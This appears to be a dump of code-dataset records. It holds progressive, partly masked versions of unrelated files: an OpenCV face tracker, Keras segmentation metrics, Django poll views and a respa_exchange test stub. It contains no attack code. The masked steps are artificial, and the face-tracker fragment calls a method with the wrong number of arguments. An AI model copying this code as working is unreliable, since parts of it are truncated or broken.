in assignmentList:\n\t\t\t\t\t\t\t# print notList\n\t\t\t\t\t\t\t\tif notList[i][j] > highest:\n\t\t\t\t\t\t\t\t\tindex = j\n\t\t\t\t\t\t\t\t\thighest = notList[j][i]\n\t\t\t\t\t\tif index != -1:\n\t\t\t\t\t\t\tif notList[index][i] > self.minRemovalScore:\n\t\t\t\t\t\t\t\tface = self.notVisibleFaceList.pop(index)\n\t\t\t\t\t\t\t\tface.setPosition(rects[i])\n\t\t\t\t\t\t\t\tself.visibleFaceList.append(face)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tfc = Face()\n\t\t\t\t\t\t\tfc.id = self.totalFaceCount\n\t\t\t\t\t\t\t# print fc.id\n\t\t\t\t\t\t\tself.totalFaceCount += 1\n\t\t\t\t\t\t\tfc.setPosition(rects[i])\n\t\t\t\t\t\t\tself.visibleFaceList.append(fc)\n\t\t\t\telse:\n\t\t\t\t\tfor i in range(len(rects)):\n\t\t\t\t\t\tfc = Face()\n\t\t\t\t\t\tfc.id = self.totalFaceCount\n\t\t\t\t\t\t# print fc.id\n\t\t\t\t\t\tself.totalFaceCount += 1\n\t\t\t\t\t\tfc.setPosition(rects[i])\n\t\t\t\t\t\tself.visibleFaceList.append(fc)\n\t\t\telse:\n\t\t\t\tfor i in range(len(rects)):\n\t\t\t\t\tfc = Face()\n\t\t\t\t\tfc.id = self.totalFaceCount\n\t\t\t\t\t# print fc.id\n\t\t\t\t\tself.totalFaceCount += 1\n\t\t\t\t\tfc.setPosition(rects[i])\n\t\t\t\t\tself.visibleFaceList.append(fc)\n\n\n\t\telif len(rects)==len(self.visibleFaceList):\n\t\t\tmegaList = self.listHelper(self.visibleFaceList,rects)\n\t\t\t# print megaList\n\t\t\tassignmentList = []\n\t\t\tfor i in range(len(megaList)):\n\t\t\t\thighest = 0\n\t\t\t\tindex = 0\n\t\t\t\tfor j in range(len(megaList[i])):\n\t\t\t\t\tif megaList[i][j] >= highest and j not in assignmentList:\n\t\t\t\t\t\tindex = j\n\t\t\t\t\t\thighest = megaList[i][j]\n\t\t\t\tassignmentList.append(index)\n\t\t\t\n\t\t\tself.makeAssignments(assignmentList, rects)\n\n\t\telse:\n\t\t\t# less rects than faces\n\t\t\tmegaList = self.listHelper(self.visibleFaceList,rects)\n\t\t\t# print megaList\n\t\t\tassignmentList = []\n\t\t\tprobabilityList = []\n\t\t\tfor i in range(len(megaList)):\n\t\t\t\thighest = 0\n\t\t\t\tindex = 0\n\t\t\t\tfor j in range(len(megaList[i])):\n\t\t\t\t\tif megaList[i][j] >= highest and j not in assignmentList:\n\t\t\t\t\t\tindex = j\n\t\t\t\t\t\thighest = megaList[i][j]\n\t\t\t\tassignmentList.append(index)\n\t\t\t\tprobabilityList.append(highest)\n\n\t\t\tif len(probabilityList)!=0:\n\t\t\t\tlowIndex = probabilityList.index(min(probabilityList))\n\t\t\t\tself.notVisibleFaceList.append(self.visibleFaceList.pop(lowIndex))\n\t\t\t\tassignmentList.pop(lowIndex)\n\t\t\t\tself.makeAssignments(assignmentList, rects)\n\n\n\n\n\tdef makeAssignments(self, assignmentList, rects, indices, visibleFaces):\n\t\t# print \"assign\"\n\t\t# print assignmentList\n\t\t# print rects\n\t\tcounter = 0\n\t\t# print len(self.visibleFaceList)\n\t\tfor i in range(len(assignmentList)):\n\t\t\tif rects != []:\n\t\t\t\tif assignmentList[i] != -1:\n\t\t\t\t\tif i < visibleFaces:\n\t\t\t\t\t\tself.visibleFaceList[i].setPosition(rects[assignmentList[i]])\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint \"HERE\"\n\t\t\t\t\t\tprint assignmentList\n\t\t\t\t\t\tprint rects\n\t\t\t\t\t\tprint assignmentList[indices[counter]]\n\t\t\t\t\t\tprint rects[assignmentList[indices[counter]]]\n\t\t\t\t\t\tself.visibleFaceList[counter+visibleFaces].setPosition(rects[assignmentList[indices[counter]]])\n\t\t\t\t\t\tcounter += 1\n\n\n\tdef scoreForBeingHere(self, face1, rect):\n\t\t\"\"\"compares face and rect to sees what the chances are that they are the same\n\t\treturns float between 0 and 1\"\"\"\n\t\ttime = dt.datetime.now()\n\t\trecentPosition = face1.getPosition()\n\t\tif not (recentPosition==[]):\n\t\t\tdeltaTime = (time - recentPosition[2]).total_seconds()\n\t\t\tvelocity = face1.getVelocity()\n\t\t\tarea = math.pow(face1.getArea(),0.5)\n\t\t\tif self.usingTime:\n\t\t\t\tradius = deltaTime*area*self.radiusSize\n\t\t\telse:\n\t\t\t\tradius = area*self.radiusSize\n\t\t\tmiddleOfRect = ((rect[2]+rect[0])/2,(rect[3]+rect[1])/2)\n\t\t\tmiddleOfFace = ((recentPosition[1][0]+recentPosition[0][0])/2,(recentPosition[1][1]+recentPosition[0][1])/2)\n\t\t\tif velocity != 0:\n\t\t\t\tmiddleOfFace = (middleOfFace[0] + velocity[0]/velocity[2]*deltaTime*self.velocityWeight, middleOfFace[1] + velocity[1]/velocity[2]*deltaTime*self.velocityWeight)\n\t\t\tdiffMiddles = math.pow(math.pow(middleOfFace[0]-middleOfRect[0], 2) + math.pow(middleOfFace[1]-middleOfRect[1], 2), 0.5)\n\t\t\t\n\n\t\t\t# asymptote equation such that after the difference in middles is more than 1 radius away,\n\t\t\t# prob will be down to 0.25 but after that it slowly goes to 0 never quite reaching it\n\t\t\tx = math.pow(diffMiddles/radius,3)\n\t\t\t# decays with increase in time\n\t\t\tif self.usingTime:\n\t\t\t\tscore = self.scoreWeight/(deltaTime*(3*x+1))\n\t\t\telse:\n\t\t\t\tscore = self.scoreWeight/((3*x+1))\n\t\t\treturn score\n\t\telse:\n\t\t\treturn 0\n\n\n\tdef readFrame(self):\n\t\t\"\"\"read frame from openCV info\"\"\"\n\t\tsuccess, self.frameImage = self.vidcap.read()\n\t\treturn success, self.frameImage\n\n\n\tdef detectAll(self):\n\t\t\"\"\"Run face detection algorithm on the whole picture and make adjustments \n\t\tto the faces based on where the are and where they should be\"\"\"\n\t\trects = self.cascade.detectMultiScale(self.frameImage, 1.3, 4, cv2.cv.CV_HAAR_SCALE_IMAGE, (20,20))\n\t\treturn rects\n\n\n\t# # won't really ever use\n\t# def estimateAll(self):\n\t# \t\"\"\"Step forward one frame, update all (visible?) faces based on estimation \n\t# \tfrom velocities; don't run face detection algorithm\n\t# \tShould be run every frame except where detectAll() is run.\"\"\"\n\t# \tpass\n\t# \t# for face in self.visibleFaceList[]:\n\t# \t# \tface.estimateNextPosition()\n\n\n\tdef findFaces(self):\n\t\t\"\"\"detects all faces with the frame then analyzes the frame to determine\n\t\twhich face belongs to which face object\"\"\"\n\t\trects = self.detectAll()\n\t\tif len(rects)==0:\n\t\t\trects = []\n\t\telse:\n\t\t\trects[:, 2:] += rects[:, :2]\n\t\tself.analyzeFrame(rects)\n\n\n\tdef display(self):\n\t\t\"\"\" Displays current frame with rectangles and boxes\"\"\"\n\t\t# print len(self.visibleFaceList)\n\t\t# print \"not visible: \"\n\t\t# for face in self.notVisibleFaceList:\n\t\t# \tprint face.id\n\t\t# print \"visibel: \"\n\t\tfor i in range(len(self.visibleFaceList)):\n\t\t\t# print self.visibleFaceList[i].id\n\t\t\tself.showRectangle(self.visibleFaceList[i].getPosition(),self.visibleFaceList[i].id)\n\t\tcv2.imshow(\"show\", self.frameImage)\n\n\tdef clean(self):\n\t\ti = 0\n\t\twhile i < len(self.notVisibleFaceList):\n\t\t\tif len(self.notVisibleFaceList[i].prevPositions) < self.cleanThresh:\n\t\t\t\tself.notVisibleFaceList.pop(i)\n\t\t\t\tself.totalFaceCount -= 1\n\t\t\ti += 1\n\n\n\tdef showRectangle(self, pos, IDnum):\n\t\tcv2.rectangle(self.frameImage, pos[0], pos[1], (255,0,0), 2)\n\t\tcv2.putText(self.frameImage, str(IDnum), pos[0], cv2.FONT_HERSHEY_SIMPLEX, 2, [0,255,0], 3)\n\t\t\n\n\tdef endWindow(self):\n\t\t\"\"\"stops using webcam (or whatever source is) and removes display window\"\"\"\n\t\tself.vidcap.release()\n\t\tcv2.destroyWindow(\"show\")",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
def false_pos(y_true, y_pred):
smooth = 1
y_pred_pos = K.round(K.clip(y_pred, 0, 1))
y_pos = K.round(K.clip(y_true, 0, 1))
y_neg = 1 - y_pos
fp = K.sum(y_neg * y_pred_pos)
fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)
return fp_ratio
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def dice_coef(y_true, y_pred):
smooth = 1.0
y_true_f = K.flatten(y_true)
y_pred_f = K.flatten(y_pred)
intersection = K.sum(y_true_f * y_pred_f)
union = K.sum(y_true_f) + K.sum(y_pred_f)
return (2.0 * intersection + smooth) / (union + smooth)
def true_pos(y_true, y_pred):
smooth = 1
y_pred_pos = K.round(K.clip(y_pred, 0, 1))
y_pos = K.round(K.clip(y_true, 0, 1))
tp = (K.sum(y_pos * y_pred_pos) + smooth) / (K.sum(y_pos) + smooth)
return tp
<|reserved_special_token_0|>
def false_pos(y_true, y_pred):
smooth = 1
y_pred_pos = K.round(K.clip(y_pred, 0, 1))
y_pos = K.round(K.clip(y_true, 0, 1))
y_neg = 1 - y_pos
fp = K.sum(y_neg * y_pred_pos)
fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)
return fp_ratio
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def dice_coef(y_true, y_pred):
smooth = 1.0
y_true_f = K.flatten(y_true)
y_pred_f = K.flatten(y_pred)
intersection = K.sum(y_true_f * y_pred_f)
union = K.sum(y_true_f) + K.sum(y_pred_f)
return (2.0 * intersection + smooth) / (union + smooth)
def true_pos(y_true, y_pred):
smooth = 1
y_pred_pos = K.round(K.clip(y_pred, 0, 1))
y_pos = K.round(K.clip(y_true, 0, 1))
tp = (K.sum(y_pos * y_pred_pos) + smooth) / (K.sum(y_pos) + smooth)
return tp
def true_neg(y_true, y_pred):
smooth = 1
y_pred_pos = K.round(K.clip(y_pred, 0, 1))
y_pred_neg = 1 - y_pred_pos
y_pos = K.round(K.clip(y_true, 0, 1))
y_neg = 1 - y_pos
tn = K.sum(y_neg * y_pred_neg)
tn_ratio = (tn + smooth) / (K.sum(y_neg) + smooth)
return tn_ratio
def false_pos(y_true, y_pred):
smooth = 1
y_pred_pos = K.round(K.clip(y_pred, 0, 1))
y_pos = K.round(K.clip(y_true, 0, 1))
y_neg = 1 - y_pos
fp = K.sum(y_neg * y_pred_pos)
fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)
return fp_ratio
<|reserved_special_token_1|>
import tensorflow.keras.backend as K
def dice_coef(y_true, y_pred):
smooth = 1.0
y_true_f = K.flatten(y_true)
y_pred_f = K.flatten(y_pred)
intersection = K.sum(y_true_f * y_pred_f)
union = K.sum(y_true_f) + K.sum(y_pred_f)
return (2.0 * intersection + smooth) / (union + smooth)
def true_pos(y_true, y_pred):
smooth = 1
y_pred_pos = K.round(K.clip(y_pred, 0, 1))
y_pos = K.round(K.clip(y_true, 0, 1))
tp = (K.sum(y_pos * y_pred_pos) + smooth) / (K.sum(y_pos) + smooth)
return tp
def true_neg(y_true, y_pred):
smooth = 1
y_pred_pos = K.round(K.clip(y_pred, 0, 1))
y_pred_neg = 1 - y_pred_pos
y_pos = K.round(K.clip(y_true, 0, 1))
y_neg = 1 - y_pos
tn = K.sum(y_neg * y_pred_neg)
tn_ratio = (tn + smooth) / (K.sum(y_neg) + smooth)
return tn_ratio
def false_pos(y_true, y_pred):
smooth = 1
y_pred_pos = K.round(K.clip(y_pred, 0, 1))
y_pos = K.round(K.clip(y_true, 0, 1))
y_neg = 1 - y_pos
fp = K.sum(y_neg * y_pred_pos)
fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)
return fp_ratio
<|reserved_special_token_1|>
# Copyright (c) 2020 Hai Nguyen
#
# This software is released under the MIT License.
# https://opensource.org/licenses/MIT
import tensorflow.keras.backend as K
def dice_coef(y_true, y_pred):
smooth = 1.
y_true_f = K.flatten(y_true)
y_pred_f = K.flatten(y_pred)
intersection = K.sum(y_true_f * y_pred_f)
union = K.sum(y_true_f) + K.sum(y_pred_f)
return (2. * intersection + smooth) / (union + smooth)
def true_pos(y_true, y_pred):
smooth = 1
y_pred_pos = K.round(K.clip(y_pred, 0, 1))
y_pos = K.round(K.clip(y_true, 0, 1))
tp = (K.sum(y_pos * y_pred_pos) + smooth) / (K.sum(y_pos) + smooth)
return tp
def true_neg(y_true, y_pred):
smooth = 1
y_pred_pos = K.round(K.clip(y_pred, 0, 1))
y_pred_neg = 1 - y_pred_pos
y_pos = K.round(K.clip(y_true, 0, 1))
y_neg = 1 - y_pos
tn = K.sum(y_neg * y_pred_neg)
tn_ratio = (tn + smooth) / (K.sum(y_neg) + smooth)
return tn_ratio
def false_pos(y_true, y_pred):
smooth = 1
y_pred_pos = K.round(K.clip(y_pred, 0, 1))
y_pos = K.round(K.clip(y_true, 0, 1))
y_neg = 1 - y_pos
fp = K.sum(y_neg * y_pred_pos)
fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)
return fp_ratio
|
flexible
|
{
"blob_id": "18b10a68b2707b7bfeccbd31c5d15686453b3406",
"index": 6253,
"step-1": "<mask token>\n\n\ndef false_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n fp = K.sum(y_neg * y_pred_pos)\n fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)\n return fp_ratio\n",
"step-2": "<mask token>\n\n\ndef dice_coef(y_true, y_pred):\n smooth = 1.0\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = K.sum(y_true_f * y_pred_f)\n union = K.sum(y_true_f) + K.sum(y_pred_f)\n return (2.0 * intersection + smooth) / (union + smooth)\n\n\ndef true_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n tp = (K.sum(y_pos * y_pred_pos) + smooth) / (K.sum(y_pos) + smooth)\n return tp\n\n\n<mask token>\n\n\ndef false_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n fp = K.sum(y_neg * y_pred_pos)\n fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)\n return fp_ratio\n",
"step-3": "<mask token>\n\n\ndef dice_coef(y_true, y_pred):\n smooth = 1.0\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = K.sum(y_true_f * y_pred_f)\n union = K.sum(y_true_f) + K.sum(y_pred_f)\n return (2.0 * intersection + smooth) / (union + smooth)\n\n\ndef true_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n tp = (K.sum(y_pos * y_pred_pos) + smooth) / (K.sum(y_pos) + smooth)\n return tp\n\n\ndef true_neg(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pred_neg = 1 - y_pred_pos\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n tn = K.sum(y_neg * y_pred_neg)\n tn_ratio = (tn + smooth) / (K.sum(y_neg) + smooth)\n return tn_ratio\n\n\ndef false_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n fp = K.sum(y_neg * y_pred_pos)\n fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)\n return fp_ratio\n",
"step-4": "import tensorflow.keras.backend as K\n\n\ndef dice_coef(y_true, y_pred):\n smooth = 1.0\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = K.sum(y_true_f * y_pred_f)\n union = K.sum(y_true_f) + K.sum(y_pred_f)\n return (2.0 * intersection + smooth) / (union + smooth)\n\n\ndef true_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n tp = (K.sum(y_pos * y_pred_pos) + smooth) / (K.sum(y_pos) + smooth)\n return tp\n\n\ndef true_neg(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pred_neg = 1 - y_pred_pos\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n tn = K.sum(y_neg * y_pred_neg)\n tn_ratio = (tn + smooth) / (K.sum(y_neg) + smooth)\n return tn_ratio\n\n\ndef false_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n fp = K.sum(y_neg * y_pred_pos)\n fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)\n return fp_ratio\n",
"step-5": "# Copyright (c) 2020 Hai Nguyen\n# \n# This software is released under the MIT License.\n# https://opensource.org/licenses/MIT\n\nimport tensorflow.keras.backend as K\n\n\ndef dice_coef(y_true, y_pred):\n smooth = 1.\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = K.sum(y_true_f * y_pred_f)\n union = K.sum(y_true_f) + K.sum(y_pred_f)\n return (2. * intersection + smooth) / (union + smooth)\n\n\ndef true_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n tp = (K.sum(y_pos * y_pred_pos) + smooth) / (K.sum(y_pos) + smooth) \n return tp \n\n\ndef true_neg(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pred_neg = 1 - y_pred_pos\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n tn = K.sum(y_neg * y_pred_neg)\n tn_ratio = (tn + smooth) / (K.sum(y_neg) + smooth)\n return tn_ratio\n\n\ndef false_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n fp = K.sum(y_neg * y_pred_pos)\n fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)\n return fp_ratio\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
from django.shortcuts import render
from rest_framework import status
from rest_framework.views import APIView
from rest_framework.response import Response
from polls.models import Poll
from .serializers import PollSerializer
# class PollView(APIView):
#
# def get(self, request):
# serializer = PollSerializer(Poll.objects.all(), many=True)
# response = {"polls": serializer.data}
# return Response(response, status=status.HTTP_200_OK)
#
# def post(self, request, format=None):
# data = request.data
# serializer = PollSerializer(data=data)
# if serializer.is_valid():
# poll = Poll(**data)
# poll.save()
# response = serializer.data
# return Response(response, status=status.HTTP_200_OK)
#
#
def index(request):
data = {}
return render(request,"polls/index.html",data)
#
# def show(request):
# data = {}
# p = Poll.objects.all()
# data["polls"] = p
# return render(request, "polls/show.html", data)
def show(request):
# data = {}
# p = Poll.objects.all()
# data["polls"] = p
return render(request, "polls/show.html")
def searchShow(request):
if 'search' in request.GET:
search_string = request.GET['search']
context = {
"search_string": search_string,
}
return render(request, "polls/show.html", context)
|
normal
|
{
"blob_id": "866ff68744a16158b7917ca6defc35440208ae71",
"index": 8575,
"step-1": "<mask token>\n\n\ndef index(request):\n data = {}\n return render(request, 'polls/index.html', data)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef index(request):\n data = {}\n return render(request, 'polls/index.html', data)\n\n\n<mask token>\n\n\ndef searchShow(request):\n if 'search' in request.GET:\n search_string = request.GET['search']\n context = {'search_string': search_string}\n return render(request, 'polls/show.html', context)\n",
"step-3": "<mask token>\n\n\ndef index(request):\n data = {}\n return render(request, 'polls/index.html', data)\n\n\ndef show(request):\n return render(request, 'polls/show.html')\n\n\ndef searchShow(request):\n if 'search' in request.GET:\n search_string = request.GET['search']\n context = {'search_string': search_string}\n return render(request, 'polls/show.html', context)\n",
"step-4": "from django.shortcuts import render\nfrom rest_framework import status\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom polls.models import Poll\nfrom .serializers import PollSerializer\n\n\ndef index(request):\n data = {}\n return render(request, 'polls/index.html', data)\n\n\ndef show(request):\n return render(request, 'polls/show.html')\n\n\ndef searchShow(request):\n if 'search' in request.GET:\n search_string = request.GET['search']\n context = {'search_string': search_string}\n return render(request, 'polls/show.html', context)\n",
"step-5": "from django.shortcuts import render\n\nfrom rest_framework import status\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\n\nfrom polls.models import Poll\nfrom .serializers import PollSerializer\n\n\n# class PollView(APIView):\n#\n# def get(self, request):\n# serializer = PollSerializer(Poll.objects.all(), many=True)\n# response = {\"polls\": serializer.data}\n# return Response(response, status=status.HTTP_200_OK)\n#\n# def post(self, request, format=None):\n# data = request.data\n# serializer = PollSerializer(data=data)\n# if serializer.is_valid():\n# poll = Poll(**data)\n# poll.save()\n# response = serializer.data\n# return Response(response, status=status.HTTP_200_OK)\n#\n#\ndef index(request):\n data = {}\n return render(request,\"polls/index.html\",data)\n#\n# def show(request):\n# data = {}\n# p = Poll.objects.all()\n# data[\"polls\"] = p\n# return render(request, \"polls/show.html\", data)\n\ndef show(request):\n # data = {}\n # p = Poll.objects.all()\n # data[\"polls\"] = p\n return render(request, \"polls/show.html\")\n\n\n\ndef searchShow(request):\n if 'search' in request.GET:\n search_string = request.GET['search']\n context = {\n \"search_string\": search_string,\n }\n return render(request, \"polls/show.html\", context)",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import pytest
from django.utils.crypto import get_random_string
from django.utils.timezone import now
from respa_exchange import listener
from respa_exchange.ews.xml import M, NAMESPACES, T
from respa_exchange.models import ExchangeResource
from respa_exchange.tests.session import SoapSeller
class SubscriptionHandler(object):
"""
SoapSeller handler for the streaming requests.
"""
def __init__(self, resource):
self.resource = resource
self.subscription_to_resource = {}
def handle_subscribe(self, request):
if not request.xpath('//m:StreamingSubscriptionRequest', namespaces=NAMESPACES): # pragma: no cover
return
emails = request.xpath('//t:EmailAddress', namespaces=NAMESPACES)
assert len(emails) == 1
assert emails[0].text == self.resource.principal_email
subscription_id = get_random_string(10)
self.subscription_to_resource[subscription_id] = self.resource
return M.SubscribeResponse(
M.ResponseMessages(
M.SubscribeResponseMessage(
M.ResponseCode('NoError'),
M.SubscriptionId(subscription_id),
ResponseClass='Success',
),
),
)
def _generate_event(self, type):
return getattr(T, type)(
T.TimeStamp(now().isoformat()),
T.ItemId(
Id=get_random_string(),
ChangeKey=get_random_string(),
),
T.ParentFolderId(
Id=get_random_string(),
ChangeKey=get_random_string(),
),
)
def handle_get_events(self, request):
if not request.xpath('//m:GetStreamingEvents', namespaces=NAMESPACES): # pragma: no cover
return
sub_id = request.xpath('//t:SubscriptionId', namespaces=NAMESPACES)[0].text
# This would be a long-polling operation,
# but ain't nobody got time for that
return M.GetStreamingEventsResponse(
M.ResponseMessages(
M.GetStreamingEventsResponseMessage(
M.ResponseCode('NoError'),
M.Notifications(
M.Notification(
T.SubscriptionId(sub_id),
self._generate_event('NewMailEvent'),
),
),
ResponseClass='Success',
),
),
)
def handle_unsubscribe(self, request):
if not request.xpath('//m:Unsubscribe', namespaces=NAMESPACES): # pragma: no cover
return
subscription_id = request.xpath('//m:SubscriptionId', namespaces=NAMESPACES)[0].text
self.subscription_to_resource.pop(subscription_id)
return M.UnsubscribeResponse(
M.ResponseMessages(
M.UnsubscribeResponseMessage(
M.ResponseCode('NoError'),
ResponseClass='Success',
),
),
)
@pytest.mark.django_db
def test_listener(settings, space_resource, exchange, monkeypatch):
email = '%s@example.com' % get_random_string()
ex_resource = ExchangeResource.objects.create(
resource=space_resource,
principal_email=email,
exchange=exchange,
sync_to_respa=True,
)
assert ex_resource.reservations.count() == 0
delegate = SubscriptionHandler(ex_resource)
SoapSeller.wire(settings, delegate)
notification_listener = listener.NotificationListener()
synced_resources = [] # Keep track of the resources we get sync-request events for
def sync_resource(resource): # Our pretend sync handler
synced_resources.append(resource)
# Ask the listener to stop after we get a resource,
# so this test actually ends someday:
notification_listener.stop()
monkeypatch.setattr(listener, 'sync_from_exchange', sync_resource)
notification_listener.start()
# ... so when `sync_resource` is called, this'll eventually happen:
assert ex_resource in synced_resources
|
normal
|
{
"blob_id": "e4bfa0a55fe0dbb547bc5f65554ef96be654ec7a",
"index": 2176,
"step-1": "<mask token>\n\n\nclass SubscriptionHandler(object):\n <mask token>\n <mask token>\n\n def handle_subscribe(self, request):\n if not request.xpath('//m:StreamingSubscriptionRequest', namespaces\n =NAMESPACES):\n return\n emails = request.xpath('//t:EmailAddress', namespaces=NAMESPACES)\n assert len(emails) == 1\n assert emails[0].text == self.resource.principal_email\n subscription_id = get_random_string(10)\n self.subscription_to_resource[subscription_id] = self.resource\n return M.SubscribeResponse(M.ResponseMessages(M.\n SubscribeResponseMessage(M.ResponseCode('NoError'), M.\n SubscriptionId(subscription_id), ResponseClass='Success')))\n <mask token>\n\n def handle_get_events(self, request):\n if not request.xpath('//m:GetStreamingEvents', namespaces=NAMESPACES):\n return\n sub_id = request.xpath('//t:SubscriptionId', namespaces=NAMESPACES)[0\n ].text\n return M.GetStreamingEventsResponse(M.ResponseMessages(M.\n GetStreamingEventsResponseMessage(M.ResponseCode('NoError'), M.\n Notifications(M.Notification(T.SubscriptionId(sub_id), self.\n _generate_event('NewMailEvent'))), ResponseClass='Success')))\n\n def handle_unsubscribe(self, request):\n if not request.xpath('//m:Unsubscribe', namespaces=NAMESPACES):\n return\n subscription_id = request.xpath('//m:SubscriptionId', namespaces=\n NAMESPACES)[0].text\n self.subscription_to_resource.pop(subscription_id)\n return M.UnsubscribeResponse(M.ResponseMessages(M.\n UnsubscribeResponseMessage(M.ResponseCode('NoError'),\n ResponseClass='Success')))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass SubscriptionHandler(object):\n \"\"\"\n SoapSeller handler for the streaming requests.\n \"\"\"\n\n def __init__(self, resource):\n self.resource = resource\n self.subscription_to_resource = {}\n\n def handle_subscribe(self, request):\n if not request.xpath('//m:StreamingSubscriptionRequest', namespaces\n =NAMESPACES):\n return\n emails = request.xpath('//t:EmailAddress', namespaces=NAMESPACES)\n assert len(emails) == 1\n assert emails[0].text == self.resource.principal_email\n subscription_id = get_random_string(10)\n self.subscription_to_resource[subscription_id] = self.resource\n return M.SubscribeResponse(M.ResponseMessages(M.\n SubscribeResponseMessage(M.ResponseCode('NoError'), M.\n SubscriptionId(subscription_id), ResponseClass='Success')))\n\n def _generate_event(self, type):\n return getattr(T, type)(T.TimeStamp(now().isoformat()), T.ItemId(Id\n =get_random_string(), ChangeKey=get_random_string()), T.\n ParentFolderId(Id=get_random_string(), ChangeKey=\n get_random_string()))\n\n def handle_get_events(self, request):\n if not request.xpath('//m:GetStreamingEvents', namespaces=NAMESPACES):\n return\n sub_id = request.xpath('//t:SubscriptionId', namespaces=NAMESPACES)[0\n ].text\n return M.GetStreamingEventsResponse(M.ResponseMessages(M.\n GetStreamingEventsResponseMessage(M.ResponseCode('NoError'), M.\n Notifications(M.Notification(T.SubscriptionId(sub_id), self.\n _generate_event('NewMailEvent'))), ResponseClass='Success')))\n\n def handle_unsubscribe(self, request):\n if not request.xpath('//m:Unsubscribe', namespaces=NAMESPACES):\n return\n subscription_id = request.xpath('//m:SubscriptionId', namespaces=\n NAMESPACES)[0].text\n self.subscription_to_resource.pop(subscription_id)\n return M.UnsubscribeResponse(M.ResponseMessages(M.\n UnsubscribeResponseMessage(M.ResponseCode('NoError'),\n ResponseClass='Success')))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass SubscriptionHandler(object):\n \"\"\"\n SoapSeller handler for the streaming requests.\n \"\"\"\n\n def __init__(self, resource):\n self.resource = resource\n self.subscription_to_resource = {}\n\n def handle_subscribe(self, request):\n if not request.xpath('//m:StreamingSubscriptionRequest', namespaces\n =NAMESPACES):\n return\n emails = request.xpath('//t:EmailAddress', namespaces=NAMESPACES)\n assert len(emails) == 1\n assert emails[0].text == self.resource.principal_email\n subscription_id = get_random_string(10)\n self.subscription_to_resource[subscription_id] = self.resource\n return M.SubscribeResponse(M.ResponseMessages(M.\n SubscribeResponseMessage(M.ResponseCode('NoError'), M.\n SubscriptionId(subscription_id), ResponseClass='Success')))\n\n def _generate_event(self, type):\n return getattr(T, type)(T.TimeStamp(now().isoformat()), T.ItemId(Id\n =get_random_string(), ChangeKey=get_random_string()), T.\n ParentFolderId(Id=get_random_string(), ChangeKey=\n get_random_string()))\n\n def handle_get_events(self, request):\n if not request.xpath('//m:GetStreamingEvents', namespaces=NAMESPACES):\n return\n sub_id = request.xpath('//t:SubscriptionId', namespaces=NAMESPACES)[0\n ].text\n return M.GetStreamingEventsResponse(M.ResponseMessages(M.\n GetStreamingEventsResponseMessage(M.ResponseCode('NoError'), M.\n Notifications(M.Notification(T.SubscriptionId(sub_id), self.\n _generate_event('NewMailEvent'))), ResponseClass='Success')))\n\n def handle_unsubscribe(self, request):\n if not request.xpath('//m:Unsubscribe', namespaces=NAMESPACES):\n return\n subscription_id = request.xpath('//m:SubscriptionId', namespaces=\n NAMESPACES)[0].text\n 